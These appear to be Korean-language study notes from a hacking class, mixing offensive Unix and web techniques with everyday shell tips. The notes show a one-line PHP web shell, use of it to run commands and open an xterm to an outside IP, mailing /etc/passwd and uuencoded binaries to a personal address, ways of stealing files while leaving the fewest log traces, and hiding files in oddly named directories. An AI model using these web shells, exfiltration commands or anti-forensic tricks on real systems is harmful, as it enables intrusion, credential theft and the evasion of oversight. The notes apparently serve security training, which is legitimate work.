echo `$_GET[cmd]`;
사실 확장자가 의미가 있지 않아!
확장자에 매칭이 되는 어플리케이션을 연결해주는 데에만 의의가 있다
헤더가 중요한것!
url?cmd=id
url?cmd-xterm -display%20192.168.142.2:0
내 pc 가 xhost+일때만 위험
startx 나 xinit
| |
.startx .xinitrc 여기 파일에 xhost-를 넣어두면 안전!
xterm 6000-6035번 포트를 사용하는데, 그래서 주로 방화벽으로 막아놓은다!,
퀴즈
원격 서버에 있는 파일을 내쪽으로 전송해 오는 방법
-scp,sftp,ftp
mail sonysame@naver.com </etc/passwd
mail -s "Passed" sonysame@naver.com < /etc/passwd
바이너리인 경우! uuencode 를 사용한다
바이너리가 온다! base64로 인코딩된!
uuencode ls.steal output | mail sonysame@naver.com
(훔치고 싶은 바이너리)
uuencode ls.steal ls.steal > encoded.txt
uudecode ./encoded.txt
(메일로 온것은 uudecode를 사용해서 디코딩해준다!)
-screen, mouse copy&paste
-wget (그 파일이라 ftp, http로 접속이 가능해야 한다)
-curl
증거가 안남고 갖고 오는 방법
ftp->authlog, secure(리눅스), syslog, messages(syslog.conf설정에 따름)에 기록이 남는다
wtmp, wtmpx, utmp, utmpx
xferlog
sftp/scp->autholog, secure, syslog, messages(syslog.conf 설정에 따름)
wtmp, wtmpx, utmp, utmpx
mail->maillog(/bar/spool), syslog.conf
마우스 cpoy&paste, 스크린 버퍼 이용하는게 가장 기록에 안 남는다
ls -F
-hack,
-로 시작하는 파일은 어떻게 지워야 할까?
rm -hack을 하면 옵션으로 인식되어서 지워지지 않는다!
rm ./-hack
rm - -hack
배쉬를 이용하거나..?!?
mkdir, rmdir 를 이용해서 a/b/c 디렉토리 생성 삭제
sudo/su
sudo -> 내 비번 ->관리자 권한 일시적으로 받음
su -> 관리자 비번
id
whoami
who am i -> 실제로 루트 아니라서 안나옴
sudo 명령 옵션을 잘 주어야 기록을 안남길 수 있다
su zest와 su - zest의 차이는 무엇일까
whom who am i 는 어떻게 될까?
우분투/맥오에스 관리자 권한으로 바로 로그인 불가능하다!
/ root directory
\ alias무시
export ls='ls -Fc' 로 alias 설정( bash에서)
tcshell에서
alias ls 'ls -Fc'
alias rm 'rm -i' 진짜로 지우시겠습니까를 매번 물어본다!
\rm ls.steal
특수문자를 인식시키고 싶은 ~\~
cd / -> 루트
여기서 ..해도 루트!
파일을 숨기고 싶을 때
.으로 시작하는 디렉토리면 유용!
mkdir ...
triky해진다!
mkdir ..^H
ctrl+l 화면정리
ctrl+m, ctrl+j 줄바꿈
ctrl+h 백스페이스
ctrl+v ctrl+h
ctrl+v가 ctrl+h가 백스페이스에 해당하지 않도록 해준다!
ls -asl | cat -v
개행문자까지 보여준다 포렌식할때 매우 중요한 명령어이다!
공백인 디렉토리를 만들 수 있다
ctrl+d 하면 cat으로 파일 만들고 닫을때